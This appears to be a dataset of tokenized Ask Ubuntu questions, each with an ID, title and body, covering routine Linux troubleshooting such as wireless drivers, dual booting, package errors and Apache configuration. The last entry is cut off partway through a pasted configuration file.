402882	hardware reset of wireless ?	i 'm having a serious issue with my wifi . it randomly dies all the time , and when it does the only thing that can seem to get it to work again is to completely reboot my computer ( pretty annoying ) . i think if i could reset it in hardware , it would do the trick -- but nothing seems to be working . i tried the solutions given by the below links -- no luck . resetting wireless connection via command line [ solved ] how do i reset the network adapter using a terminal command ? result of doing sudo lshw -c network *-network description : wireless interface product : bcm4313 802.11bgn wireless network adapter vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth2 version : 01 serial : dc:85 : de:56 : bb:37 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.20.155.1 ( r326264 ) ip=192.168.2.137 latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:17 memory : f7d00000-f7d03fff *-network description : ethernet interface product : ar8162 fast ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth1 version : 10 serial : 74 : d0:2b:4c:40:6d capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm pciexpress msi msix bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=alx firmware=alx latency=0 link=no multicast=yes port=twisted pair resources : irq:44 memory : f7c00000-f7c3ffff ioport : e000 ( size=128 )
402883	ralink 3090 unstable wireless connection	recently i moved from windows , and since i installed a linux distro my wireless connection is uncommonly slow ( ~50kb/s from ~2mb/s ) . i got no problems using wired internet from the same router . i 've read about alot of possible issues around the web the past couple of days , i tried disabling ipv6 and n connection , wicd , edited nsswitch.conf , did wlan0 power off , got rt2800 firmware pack ( i think that here is the problem , no fix found tho ) , checked blacklist , modified channel and dns and etc . what i got is , that every time i connect to my wireless network my internet is good for the first 1-2 minutes , then it drops . i think that this would explain the problem to a person , that is into network and wireless . thanks !
402884	upgrading ubuntu from lts to newer version , in steps or simply release upgrade ?	i am working with ubuntu servers since some month , so not too long . i never upgraded an ubuntu version . so right now i am running 12.04 and what i need is 13.04 . i once hear that i should first upgrade to 12.10 and than to 13.04 ( for me that does n't make too much sense , but i am not sure ) . when i run sudo do-release-upgrade -d ubuntu wants to install 14.04 . as far as i know 13.04 is now the stable version . how to achieve the step by step upgrading ? even though it 's not the best way , i want to try it out on my virtual machine .
402889	ubuntu one : file modified dates versus synchronization date	i have installed ubuntu one application on two devices : 1 ) laptop with ubuntu 12.04 ( about two years ago ) ; 2 ) destop pc with xubuntu 12.04 ( added about 2 weeks ago ) . i 've just realized that on the new desktop pc the date and the hour of all the ubuntu one files is set as the date and hour of the first sync ( e.g . 2013-12-27 ) , wereas with the web login the date is correct ( e.g . 2013-07-27 ) . i checked on ubuntu one help and this behaviour appears intentional , but this is a very big problem in order to manage my documents . can someone suggest me some trick ?
402890	file permissions change after copying to portable hard disk	i had copied a directory contain c language source code files and some shell scripts from my ubuntu 12.10 64 bit laptop to a portable hard disk some time back . i had copied it under root login . now , today when i copied it back from the portable disk to the same laptop under root login , i observed that the file permissions had changed from the original 755 to 400 which caused some scripts to fail . how should i copy to the hard disk so that the directory and its content retain the permissions ?
402891	given a package name , how can i find out what will change if i install the package ?	given a set of apt commands and packages to apply ( e.g . install foo bar baz , autoremove quux blerg bang ) , is there a way to calculate the diff of the system state that will be produced if i run the commands ? by `` system state '' i do n't merely mean whether a given package will install/remove other packages , but what kinds of actual changes get produced -- files being deleted or moved , scripts getting run , et cetera .
402894	reading files list for package 'linux-headers-3.2.0-58 ' : input/output error	i 'm getting the following error when i try to upgrade my system . ( reading database ... 95 % dpkg : unrecoverable fatal error , aborting : reading files list for package 'linux-headers-3.2.0-58 ' : input/output error e : sub-process /usr/bin/dpkg returned an error code ( 2 )
402897	nvidia geforce gt 550 ti on ubuntu 12.04 ( 64-bit )	i 've checked through many forum posts some that worked for others , but none seem to work for me . i 've installed drivers 304 and deleted it , i 've installed 319 and deleted it because neither seem to work , but only render a blank screen . i 've tried editing the grub file in /etc/default/grub changing `` quiet splash '' to `` nomodeset '' restarting and trying to stop the `` gdm '' and/or `` lightgm '' processes to install the driver obtained from the nvidia website . to no avail . here is the error from '/var/log/nvidia-installer.log' error : the kernel header file '/lib/modules/3.8.0-34-generic/build/include/linux/version.h ' does not exist . the most likely reason for this is that the kernel source files in '/lib/modules/3.8.0-34-generic/build ' have not been configured . appreciate any assistance in coming to a solution . thanks .
402900	how to check if nvidia optimus drivers are install	i am running ubuntu 13.10 and i have an nvidia geforce 640m card . i installed the bumblebee ppa follow the instructions from the original website . i rebooted but how do i check if the drivers were installed ? i run glxgears and optirun with it and both of them yielded the same results . i tried installing the bumblebee gui but it 's not showing up after i boot . also , are there supposed to be any changes in the `` graphics '' section in the `` about this computer '' ? it 's currently only showing driver : intel速 ivybridge mobile experience : standard . would really appreciate any help . thanks !
402901	release date for ubuntu for android	release date for ubuntu for android other than the galaxy nexus and nexus 4 phone architecture ? ? ? any one have an offical response for this ?
402905	how to check which version of a product is available in repositories for different ubuntu versions ?	my scenario is like this : i have installed redmine on my ubuntu 12.04 server , and i installed it using apt-get install redmine . so we run the latest stable version 1.3.2 ( mysql ) , some time after that i found out that there is already 1.4 and even 2.x available to download . so i wanted to upgrade to 1.4 or any other newer version . but i found out that the newer versions are not available on the official repository . so from now on i want to check which versions are available in the ubuntu repository . is there probably even a release schedule ? and i heard that i can download redmine 1.4 from repository if i have ubuntu 13.04 , so i wondered how this works ? how to check the repository for any other ubuntu version ? many questions , looking for answers
402915	how can i hide the switch user part of unity 's top panel session indicator ?	in ubuntu 13.10 's unity panel ( the top panel , not the launcher ) , the session indicator ( top right corner ) shows the names of previously logged in users . this allows switching users , but for privacy reasons i would like to be able to hide those user names , as a lot of people use machines in our computer pool . it seems that in older versions of unity there was a dedicated 'user-indicator ' in the panel for that purpose , which could be configured via dconf . here are some of several pages that i 've found on which is explained how to show/hide things in the old user indicator as well as the session indicator : user indicator configuration do not display user name in the panel related dconf keys , that were referred to in different posts , are : apps > indicator-session > user-show-menu com > canonical > indicator > session > user-show-menu unfortunately , all these keys do n't exist anymore . the user indicator seems to have been merged into the session indicator . the graphical tool ubuntu tweak does n't have the config settings any more either . is there any way to hide the switch user part of the session indicator ? thanks : )
402926	correct way to disable avahi-daemon ?	i disabled the avahi-daemon according to the method set out here , namely editing the /etc/init/avahi-daemon.conf file to : start on ( never and filesystem and started dbus ) stop on stopping dbus after a reboot , i now get from service avahi-daemon status ( or initctl list | grep avahi ) avahi-daemon stop/waiting which sounds like i have successfully disabled the service . however , in my syslog at boot i see : dbus [ 991 ] : [ system ] failed to activate service 'org.freedesktop.avahi ' : timed out dbus [ 991 ] : [ system ] failed to activate service 'org.freedesktop.avahi ' : timed out this seems to cost me half a minute of extra boot time ... how can i disable this trying to launch avahi ?
402932	how can i add a right-click menu option to the gnome 3 app menu panel to uninstall an application ?	i want to add an option that is easily accessible to the gnome 3 panel to uninstall a program . im not talking about just removing the icon . this would be the preferred way of doing it , or if nobody already know a way , then how about a way to link add/remove programs to the panel ?
402935	can i use kde network manager to use openvpn with hostname ?	can i use kde network manager to use openvpn using my hostname ? because i am not finding any field to insert my ddns hostname .
402938	how to be able to suspend with nvidia cards ?	i 'm with geforce gtx 460 and ubuntu 13.10 i 've tried the 314 and 319 drivers , i 've also tried the fixes proposed in https : //help.ubuntu.com/community/binarydriverhowto/nvidia which are : suspend/hibernation if you use an old nvidia driver , hibernation & suspend may not work , there is a workaround however . we need to edit xorg.conf , open a terminal and enter the following command : gksudo gedit /etc/x11/xorg.conf in the section called section `` device '' add option `` nvagp '' `` 1 '' , you should end up with something like this : section `` device '' identifier `` my id '' driver `` my dr '' vendorname `` my vendor '' boardname `` my board name '' option `` nvagp '' `` 1 '' endsection blacklist the intel_agp module from being loaded by the kernel . this is done by editing blacklist.conf , open a terminal and type : gksudo gedit /etc/modprobe.d/blacklist.conf then add the following line : blacklist intel_agp reboot your system . and still ca n't get back of suspend . when i wake it up from suspend i get black screen with blinking cursor . nothing can be done , i have to restart .
402942	partition recovery after ubuntu installation	i had windows 8 and ubuntu 12.04 installed in dual boot in my laptop . apart from ubuntu drives there were 5 disk ntfs partitions . now i installed ubuntu 13.10 with the option `` erase ubuntu 12.04 and reinstall ubuntu 13.10 '' . after installing it , all the 5 disk partitions and ubuntu home partition is been merged , and now it is showing only 1 ext4 partition of 931 gb . and windows boot options is also not there in boot menu . i tried testdisk , it is also showing only ubuntu partitions and 1 ext4 partition . can anyone tell , how to recover those lost 5 partitions and windows bootloader ? ?
402944	what is the meaning of output in terminal when i run mysql-workbench	i am running ubuntu 12.04.3 lts with mysql workbench version 5.2.38 . i am trying to fix this problem mysql-workbench only shows splash screen when being launched when i run $ mysql-workbench i see this output like this in terminal . does that mean that mysql workbench is launching ? that is crashing ? how do i interpret this output ? 7f692ca70000-7f692ca72000 r -- p 00000000 08:01 1575232 ... ... 7f692ca70000-7f692ca72000 r -- p 00000000 08:01 1575232 /home/abe/.config/dconf/user 7f692ca72000-7f692ca73000 r -- s 00000000 08:01 1442769 /home/abe/.cache/dconf/user 7f692ca73000-7f692ca84000 rw-p 00000000 00:00 0 7f692ca84000-7f692ca85000 r -- p 00022000 08:01 10354811 /lib/x86_64-linux-gnu/ld-2.15.so 7f692ca85000-7f692ca87000 rw-p 00023000 08:01 10354811 /lib/x86_64-linux-gnu/ld-2.15.so 7f692ca87000-7f692d56d000 r-xp 00000000 08:01 1056586 /usr/lib/mysql-workbench/bin/mysql-workbench-bin 7f692d76d000-7f692d7c0000 r -- p 00ae6000 08:01 1056586 /usr/lib/mysql-workbench/bin/mysql-workbench-bin 7f692d7c0000-7f692d7c7000 rw-p 00b39000 08:01 1056586 /usr/lib/mysql-workbench/bin/mysql-workbench-bin 7f692e36e000-7f692e3b0000 rw-p 00000000 00:00 0 [ heap ] 7f692e3b0000-7f692e3b2000 rw-p 00000000 00:00 0 [ heap ] 7f692e3b2000-7f692f52b000 rw-p 00000000 00:00 0 [ heap ] 7fff82254000-7fff82290000 rw-p 00000000 00:00 0 [ stack ] 7fff82373000-7fff82375000 r-xp 00000000 00:00 0 [ vdso ] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [ vsyscall ] abe @ abe-nc683aa-aba-m9500y : ~ $ lsb_release -a
402945	display - > system settings no icons are available	when i go to displays in ubuntu 13.10 i get this : can you help me please ? regards .
402949	stop gnome-session trying to launch application	i would like to stop gnome-session trying to launch an application each time i login , namely gnome-screensaver.desktop ( since i have uninstalled in favor of xscreensaver so currently get a syslog error about not being able to find gnome-screensaver , of course because it was removed ) . is there somewhere that lists the applications gnome-session will try to launch that i can edit ? i thought it might be something to do with ~/.config/gnome-session or maybe /usr/share/gnome/autostart/ , but i do n't see any gnome-screensaver reference ... .maybe it can be changed with gsettings ?
402962	adf duplex hp5590	my problem is this , i have a scanner hp 5590 works very well , but when i indicated that adf duplex scanning with the result are two sides into a single page , why ? thanks
402963	add submenus to mainmenu	ubuntu 13.10 , alacarte does not work , so ... i am using menulibre to create new shortcuts to the menu and alacarte to delete all the menu entries from `` other '' sub menu . but i would like to create a submenu inside other menuitems , such as a menu called `` chat programs '' inside the `` internet '' menu . i know i can not do this with menulibre , is there a way to do it editing the .desktop files ? thank you .
402967	is there a way to change so that alt + tab will work similar to windows ?	when i open multiple terminal sessions and the sessions are buried under one application and i have to press ctrl + ` to move between the same application . is there a way to change so that alt + tab will work similar to windows ?
402972	something wrong with my dual boot install attempt	first of all my grammar is somewhat below average so i beg your pardon i tried to install ubuntu 13.10 64 bit on windows 7 32 bit with 4gigs ram using a live cd that i burned myself , i downloaded it from this website , i 've done all the partition stuff , i unallocated 22 gigs for the ubuntu . and so i booted from the cd.. after several words of `` root not found '' or something ( because i ca n't take screen shot of it + it happened so fast ) it went to a grub like interface that gave option : 1. erase disk 2. i forgot but not impportant ( not install alongside windows ) 3. i forgot but not impportant ( not install alongside windows ) 4. something else so i chose something else and do the swap thing and everything . i chose the `` / '' for mount after hours of install i noticed something weird in the process the description said `` removing bla bla.. removing bla bla.. removing grub '' wtf.. i was startled but i thought it 'll be okay . anyway when the installation finished i restarted it as asked . then when booting it went straight to windows without even asking . i know its a wall of poorly written text . but please help i really want to learn ubuntu
402973	computer overheats and shuts off after 5-10 min on ubuntu	i have just tried to install ubuntu 12.04.3 to my laptop , but i can not get through the installation , because my computer shuts off . i have windows 7 on it and that runs just fine . i have installed ubuntu to a flash driver and tried to run that on my computer , but it still keeps shutting off after a couple of minutes . the weird think is that i can run ubuntu from vmware player just fine in the background of windows . i think the problem is that the computer is overheating of the harddrive anyone have had this problem ? or know how to fix something like this ? laptop amd a8-4500m apu redaeon ( tm ) hd graphics 1.90 ghz ram 8gb 64 bit
402978	how to fix broken upgrade on ubuntu server on usb thumbdrive with encrypted lvm	oh woes is me : i decided to do a do-release upgrade on my workstation and managed to bork my production workstation . my setup was as follows : 32gb usb key that ubuntu server booted from - this required a passphrase to be entered at bootup software raid10 for 4x2tb drives when booting to the new install , it appears that grub ca n't find the filesystem to boot from , likely because it is encrypted . i never get the option to decrypt the usb drive at startup , so i 'm guessing something got messed up during the upgrade . i 've been able to boot up a live cd and mount the 32gb usb key ( the system asks for a password to decrypt and it seems to mount fine ) . so , my questions are : 1 ) how to re-enable the decryption at start up and/or how to fix this issue in general 2 ) failing 1 ) , how can i ensure that my files on my raid are safe ? can i just nuke the install on the usb key and reassemble the raid later ? thanks in advance
402980	give user write access to folder	how do i give the user 'testuser ' write privileges on the folder : /var/www/test/public_html
402981	how to get signal strenght of wifi	i want to get the wireless signal on a terminal , but only the signal . so no extra info , just the connection speed . it would help a lot ! edit : iwconfig returns this : lo no wireless extensions . eth0 no wireless extensions . eth1 ieee 802.11abg essid : '' goeggies '' mode : managed frequency:2.437 ghz access point : b4:82 : fe:93 : da : bc retry long limit:7 rts thr : off fragment thr : off power management : off
402982	how to recover ubuntu from text mode ?	my ubuntu no longer starts in graphical mode , it starts in text mode . if i try to run startx i receive unable to connect to x server : no such file or directory how can i reinstall xserver and unity ? what apt-get remove and apt-get install should i follow ?
402983	can not re-install libreoffice after purge	i wanted to substitute the default libreoffice by openoffice . to do so i followed the instructions on this link how do i install openoffice.org instead of libreoffice ? after doing it i did n't get openoffice to open any of my .odf files and now i do n't have neither libreoffice nor openoffice functioning . so now what i want to do is to install again libreoffice , but both from the software center and the terminal an error message appears saying ( sorry because the messages are in catalan and i dont know how to get them in english ) : ( on the software center ) els paquets següents tenen dependències sense satisfer : libreoffice : depends : fonts-sil-gentium-basic però no s'instal·larà depends : libreoffice-core ( = 1:4.1.4~rc2-0ubuntu1~saucy1~ppa1 ) però 1:4.1.4~rc2-0ubuntu1~saucy1~ppa1 s'instal·larà depends : fonts-dejavu però no s'instal·larà ( on the terminal ) joan @ joan-vpcea3s1e : ~ $ sudo apt-get install libreoffice [ sudo ] password for joan : s'està llegint la llista de paquets… fet s'està construint l'arbre de dependències s'està llegint la informació de l'estat… fet no s'han pogut instaŀlar alguns paquets . això pot ser degut a que heu demanat una situació impossible o que esteu emprant la distribució «unstable» i alguns paquets requerits encara no han estat creats o bé encara no els hi han introduït des d'«incoming» . la informació següent pot ajudar-vos a resoldre la situació : els següents paquets tenen dependències sense satisfer : libreoffice : depèn : fonts-sil-gentium-basic però no és instaŀlable depèn : libreoffice-base però no serà instaŀlat depèn : libreoffice-report-builder-bin però no serà instaŀlat depèn : fonts-dejavu però no és instaŀlable recomana : libreoffice-gnome però no serà instaŀlat o libreoffice-kde però no serà instaŀlat e : no es poden corregir els problemes , teniu paquets retinguts que estan trencats . what can i do ?
402985	issues with wifi connection on hp-envy j048tx with ralink rt3290 adapter	folks am not being able to connect to wifi with ralink rt 3290 on ubuntu 13.10 . it 's showing hardware switch is disabled , well i managed to connect it via terminal , it worked , but whats wrong with gui , i tried various network managers , tried installing various drivers ! ! am still looking for a solution . can anyone help ?
402987	how to reset ubuntu 's theme ?	i was wondering how to reset ubuntu 's theme to default because i installed a new theme and now everything is broken despite already resetting the theme . when i logout it goes to a blank screen and says low graphics mode and i ca n't do anything else so i have to reboot . i am unable to show you the login screen and in gnome session nothing loads it is blank . ubuntu 13.10
402991	lubuntu 13.10 does n't allways boot properly ?	i installed lubuntu 13.10 on my hp compaq 2510p after i upgraded from a hdd to a ssd . since the first installation laptop has got boot problems . sometimes it boots properly but most of the time it goes to grub rescue screen and says unknown file system . after a few hard resets and making some changes on bios it suddenly boots . some notes : before upgrading the drive i 've updated the bios . it 's the first time i 'm using a linux distro . also i 'm not an expert on windows : ) i 've found some advices on the web but since i 'm no expert , i could n't found the courage to do those solutions . ( most of them were problems with dual boot ) .
402998	update manager and it wo n't work	i 'm trying to update ubuntu 12.04 to 12.10 so i could update to most current ubuntu . when i used the `` update manager '' it does n't work . i read that it could be corrupted and to try the code : sudo apt-get update & & sudo apt-get upgrade then i get a screen that shows : configuring ttf-mscorefonts-installer with a box that has the eula agreement in it . nothing else is showing and nothing is happening . when i click on the red x , i get a message that says a process is going on , but i do n't see anything going on . so how can i get the manager updater to work so i can update to the latest ubuntu . i have a windows xp laptop 32 bit and i have ubuntu as a dual boot .
402999	how to use xfce4-panel add plugin command line	i ca n't find the proper documentation for using xfce4-panel -- add . the -- help says : -- add=plugin-name add a new plugin to the panel so i can do : xfce4-panel -- add=launcher which will pop up a dialogue asking which panel i want the launcher on , and then create a blank launcher on the panel . how can i do more ? i would like to specify from the command line : which panel to put it on ( so that i do n't get the dialogue and i can call it from a script ) the position of the launcher on the panel which program to use for the launcher i believe that some of this should be possible because the release notes for the xfce panel say : possibility to add new plugins from the command line , including startup arguments . however , i ca n't find any documentation about the `` startup arguments '' that it is referring to .
403000	start up of apache server during bootup	when i need to login to linux , i need to start the apache webserver automatically.which means i need to add the startup script part of bash scripts and include in the bootup scripts ? how can i accomplish this ?
403001	accidentally covered uefi partition by grub while installing ubuntu with win8	i have just tried to install ubuntu and run parallel with win8 . as i wanted to adjust the new ubuntu partition , i used the something else option while using the usb thumb drive with the ubuntu install files . then i created a ext4 and swap partitions . after i click continue , it warned me about the reserved bios area thing . i made a big mistake that i changed the efi partition to reserved bios area . after that , i can only boot ubuntu but not windows8 anymore . what can i do to fix it ? thank you very much ! ps : i tried boot-repair and it did n't work , here is the link paste.ubuntu.com/67211481 the sda2 should be the uefi partition .
403002	how to pass array into function and updates to array are reflected outsite function	i am trying to pass a array into a function and whatever changes made to the array is reflected outside the function function update_array ( ) { $ { 1 [ 0 ] } = '' abc '' # trying to change zero-index array to `` abc '' , # bad substitution error } foo= ( foo bar ) update_array foo [ @ ] for i in $ { foo [ @ ] } do echo `` $ i '' # currently changes are not reflected outside the function done my questions are 1 ) how do i access the index array eg : zero index array , in the function , what is the syntax for it 2 ) how do i make changes to this index array so that the changes are reflected outsite the function also
403005	unable to lock admin dir	how do i fix a could not get lock /var/lib/dpkg/lock problem ? e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ?
403009	forgot to install login screen after removing unity and installing kubuntu-desktop	first i must admit that i did something really stupid . i de-installed unity from my ubuntu 12.04 lts to install kubuntu-desktop as i wanted to try out a different desktop environment . the problem is that by de-installing unity it also de-installed my login screen . apparently ldm and gdm are not included in the kubuntu-desktop package . now this means that when i start my ubuntu with grub , i will get a black screen after the splash screen and i can not do anything . i ca n't open up a terminal , and i ca n't press alt + f2 to install either one of them . the disk is encrypted and i can not access it from my windows boot . to make the situation even more dramatic : i saved the decrypt key on the same disk on a different partition . have i completely locked myself out ? can i alter the grub configuration so that i can get a terminal after the splash ? while typing this i just came up with the idea to boot into my other linux os on that same disk . maybe i can get something to work from there .
403010	how to recover files truncated by ` > ` ?	i had a text file hello.txt which contains about 100 lines.i accidentally deleted all the lines by running echo > hello.txt now i want to recover all the 100 lines.is there any way to recover the lines in that file using terminal commands ?
403014	reinstalling maas region controller packages	since i 'm having some trouble with getting the maas api up and running on the region controller ( see starting maas region controller service and api ) , i 'm wondering if i will create any complications to an existing maas installation by purging and re-installing the region controller components ? these include , e.g . the maas-region-controller package . in particular , i do n't want to delete the information about the nodes that i already have enrolled into maas . but i guess they are stored with the cluster controller which runs on a separate machine . is that a correct understanding ? again , will i risk losing information about enrolled nodes by purging and re-installing the packages related to running the region controller ( web service and api ) ?
403021	switching from one tty to another terminates x server	i would like to login two users to my pc . one user is on tty6 and the other is on tty7 . i login the second user in tty6 and type startx to start desktop environment . whenever i switch to the default one ( tty7 ) , after switching back to tty6 , i can not see the desktop environment anymore . i need to type startx again . here is the log i got from xorg log : http : //pastebin.kde.org/pt69bk9sv how can i solve this problem ?
403025	ubuntu wont uninstall on my windows 8.1 pro with uefi ! usb stick|	i ca n't install ubuntu 12.04.3 to my notebook pc . i 've tried everything from usb drives to cd/dvd . i also have uefi and here are my system info : windows edition : windows 8.1 pro manufacturer : toshiba ( leading innovation ) model : satellite c55-a processer : intel ( r ) celeron ( r ) cpu 1037u @ 1.80ghz installed memory ( ram ) 4.00gb ( 3.88 usable ) system type : 64x bit operating system , 64x based processer no pen and touch available .
403030	server wo n't boot after installation	i am trying to install ubuntu server 12.04.3 on an old pc . i installed from a live usb , and completed the installation process , and when i removed the usb to boot into the hard drive , i got a blank screen . i reinstalled twice with the same result . i thought it was an error in my partitioning because i had originally left 1gb free at the end of my hard drive and added a small swap space . when i booted the computer with the installation media plugged in it would boot to the hard drive , and during one of the splash screens i received an error about my swap area . the error message was the disk drive /dev/mapper/cryptswap1 is not ready or is not present . at he bottom of the screen i was given the option to wait , press s to skip , or m for manual recovery . i reformatted with a single partition and no swaps and reinstalled , and still it will not boot without the installation media , and i continue to receive the error message when i boot without installation media . update : i did a clean install from a dvd iso image instead of using a usb drive and it seems to be working . not sure what significance this has , as everything else i did was identical .
403032	sudo cgpt add -i 6 -p 5 -s 1 /dev/sda not working on acer c7	i have installed chrubuntu and entered sudo cgpt add -i 6 -p 5 -s 1 /dev/sda with the user code of user __ no error or problem . when i reboot chrome comes back up . how can i get to chrunbutu again ? ? i have done tis several times . i even destroyed my hd chrome os and had to remove it and install ubuntu on it before it would restore the chrome os .
403033	a : what is the hotkey ( shortcut ) for change current gedit tab ?	how to change current gedit tab without using the mouse ?
403037	how to dual-boot windows and ubuntu ?	how can you keep different partitions for windows and ubuntu . i 'm not sure if i want to switch to full linux already , so i need to try it before . never did it before , can you guide me ?
403046	how to dual boot ubuntu 12.04 and windows 8.1 ?	i want to install ubuntu 12.04 on my computer , so that i can dual-boot it with my already existing windows 8.1 partition . how do i do this ? is it all ready to go in the `` normal '' installation file for 12.04 ?
403048	mapping midi to hotkeys and other functions ( 13.04 )	i use macbook ( snow leopard ) with controllermate on it but when i am on my rig ( ubuntu 13.04 ) i can use midi in applications but still have not found a way to map keyboard functions to midi input . im working on a new build soon with some friends and we need to be able to use midi input for hotkeys .
403051	how to share data between two computers ?	is there a way to share/transfer files between two different computers not on same network using samba or any other tool . eg . sharing a movie with a friend .
403052	deleted files in tmp folder	today i 've downloaded some files and it went into my tmp folder , i doubt it to be a virus and deleted many files from tmp folder but some of the files did n't get deleted as i do n't have sudo privileges . can this effects my host operating system functioning ?
403054	ca n't get 3d vision working	i have a new graphic card and wanted to enjoy 3d movies , however i ca n't get 3d vision to work with my setup . i tried many tutorials , without results . here are the informations i can provide : glxinfo result glxgears -stereo result : error : could n't get an rgb , double-buffered , stereo visual xorg.conf gpu : geforce gtx 660 screen : asus vg278h - active 3d ( internal ir ) ubuntu : 13.10 possible problems : i 've seen i 'm supposed to disable composite in xorg.conf , however when i do , ubuntu refuses to start ( i get a black screen after entering login information ) . edit : i have tried with kde and composite off ( since the black screen seems to be a problem in unity ) , kde boots but stereo still does n't work , so this rules out this possible reason . it may sound like a ( very ) stupid question , but how is the internal ir emitter linked ? is it done via dvi ? did i miss something that needs to be installed ? i hope someone has a great idea ! ; ) thanks for reading !
403058	bought epson xp-312 still	i have purchased a new printer , epsonxp-312 . in spite of downloading the recommended driver it will not install
403062	openldap networking setup & structure	i 'm going to be setting up ldap on ubuntu in the near future , and i have a few questions . first , let me start with our desired structure . we have an activedirectory server and an ubuntu server . we want to have both of these be ldap endpoints , but with a catch . anything we put in our activedirectory should sync to the openldap server , but not vice-versa . there will be new entries added to both endpoints as well , so just doing a one-way sync might not be the best . we want to do this because we want the company employees to be on the activedirectory , and only the employees . we do , however , want clients to have some level of access and we intend to establish that through the openldap server . i 'm a programmer by nature , so i 'm not sure how feasible this is , but i imagine it 's possible . would anyone be willing to detail how i could go about accomplishing this ? or is this how the ldap sync would work normally ? i ca n't forsee us having any collisions between the two endpoints either - i think it 's safe to say the username will always be unique .
403063	ca n't connect to internet on ubuntu 12.04.3 server	it 's basically a fresh install . i used sudo vim /etc/network/interfaces and set up a static ip . i 've check multiple times that my ip was within my network . next i used sudo vim /etc/resolv.conf to find a dns server . i used googles , 8.8.8.8 and 8.8.8.4 . next i reset my network with sudo /etc/init.d/networking restart and everything looked good . then i went to update and it does n't connect to the internet . it says err http : //us.archive.ubuntu.com precise release.gpg temporary failure resolving 'us.archive.ubuntu.com' is there something i am missing or forgetting ?
403066	windows 7 programs using ubuntu	i no longer have windows 7 installed on the system unfortunately . can i still use windows 7 programs , whether or not the programs are on usb , cd or downloaded files ? sometimes ubuntu or the system wo n't read the cd/dvd drive . what version of bitlord and photoshop should i download ? how do i find out what version of ubuntu i have ? am i searching online for ubuntu programs under `` ubuntu '' or `` linux '' ? whenever i download a program in the `` downloads '' and try to install it , i get an error message that reads an error occurred while loading the archive in archive manager . it also reads : end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive ... ...
403067	cgi-bin not work	i reinstall kubuntu 13.10 , cgi-bin not work . apache download cgi instead of execute ! i have latest apache with cgi mod enabled . i add to 000-default.conf these options scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > options +execcgi addhandler cgi-script .cgi .pl options followsymlinks require all granted < /directory > action application/x-httpd-php /cgi-bin/php5 and restart apache but problem continue . this is apache2.conf # this is the main apache server configuration file . it contains the # configuration directives that give the server its instructions . # see http : //httpd.apache.org/docs/2.4/ for detailed information about # the directives and /usr/share/doc/apache2/readme.debian about debian specific # hints . # # # summary of how the apache 2 configuration works in debian : # the apache 2 web server configuration in debian is quite different to # upstream 's suggested way to configure the web server . this is because debian's # default apache2 installation attempts to make adding and removing modules , # virtual hosts , and extra configuration directives as flexible as possible , in # order to make automating the changes and administering the server as easy as # possible . # it is split into several files forming the configuration hierarchy outlined # below , all located in the /etc/apache2/ directory : # # /etc/apache2/ # | -- apache2.conf # | ` -- ports.conf # | -- mods-enabled # | | -- *.load # | ` -- *.conf # | -- conf-enabled # | ` -- *.conf # ` -- sites-enabled # ` -- *.conf # # # * apache2.conf is the main configuration file ( this file ) . it puts the pieces # together by including all remaining configuration files when starting up the # web server . # # * ports.conf is always included from the main configuration file . it is # supposed to determine listening ports for incoming connections which can be # customized anytime . # # * configuration files in the mods-enabled/ , conf-enabled/ and sites-enabled/ # directories contain particular configuration snippets which manage modules , # global configuration fragments , or virtual host configurations , # respectively . # # they are activated by symlinking available configuration files from their # respective *-available/ counterparts . these should be managed by using our # helpers a2enmod/a2dismod , a2ensite/a2dissite and a2enconf/a2disconf . see # their respective man pages for detailed information . # # * the binary is called apache2 . due to the use of environment variables , in # the default configuration , apache2 needs to be started/stopped with # /etc/init.d/apache2 or apache2ctl . calling /usr/bin/apache2 directly will not # work with the default configuration . # global configuration # # # serverroot : the top of the directory tree under which the server's # configuration , error , and log files are kept . # # note ! if you intend to place this on an nfs ( or otherwise network ) # mounted filesystem then please read the mutex documentation ( available # at < url : http : //httpd.apache.org/docs/2.4/mod/core.html # mutex > ) ; # you will save yourself a lot of trouble . # # do not add a slash at the end of the directory path . # # serverroot `` /etc/apache2 '' # # the accept serialization lock file must be stored on a local disk . # mutex file : $ { apache_lock_dir } default # # pidfile : the file in which the server should record its process # identification number when it starts . # this needs to be set in /etc/apache2/envvars # pidfile $ { apache_pid_file } # # timeout : the number of seconds before receives and sends time out . # timeout 300 # # keepalive : whether or not to allow persistent connections ( more than # one request per connection ) . set to `` off '' to deactivate . # keepalive on # # maxkeepaliverequests : the maximum number of requests to allow # during a persistent connection . set to 0 to allow an unlimited amount . # we recommend you leave this number high , for maximum performance . # maxkeepaliverequests 100 # # keepalivetimeout : number of seconds to wait for the next request from the # same client on the same connection . # keepalivetimeout 5 # these need to be set in /etc/apache2/envvars user $ { apache_run_user } group $ { apache_run_group } # # hostnamelookups : log the names of clients or just their ip addresses # e.g. , www.apache.org ( on ) or 204.62.129.132 ( off ) . # the default is off because it 'd be overall better for the net if people # had to knowingly turn this feature on , since enabling it means that # each client request will result in at least one lookup request to the # nameserver . # hostnamelookups off # errorlog : the location of the error log file . # if you do not specify an errorlog directive within a < virtualhost > # container , error messages relating to that virtual host will be # logged here . if you *do* define an error logfile for a < virtualhost > # container , that host 's errors will be logged there and not here . # errorlog $ { apache_log_dir } /error.log # # loglevel : control the number of messages logged to the error_log . # available values : trace8 , ... , trace1 , debug , info , notice , warn , # error , crit , alert , emerg . # it is also possible to configure the log level for particular modules , e.g . # `` loglevel info ssl : warn '' # loglevel warn # include module configuration : includeoptional mods-enabled/*.load includeoptional mods-enabled/*.conf # include list of ports to listen on include ports.conf # sets the default security model of the apache2 httpd server . it does # not allow access to the root filesystem outside of /usr/share and /var/www . # the former is used by web applications packaged in debian , # the latter may be used for local directories served by the web server . if # your system is serving content from a sub-directory in /srv you must allow # access here , or in any related virtual host . < directory / > options followsymlinks allowoverride none require all denied < /directory > < directory /usr/share > allowoverride none require all granted < /directory > < directory 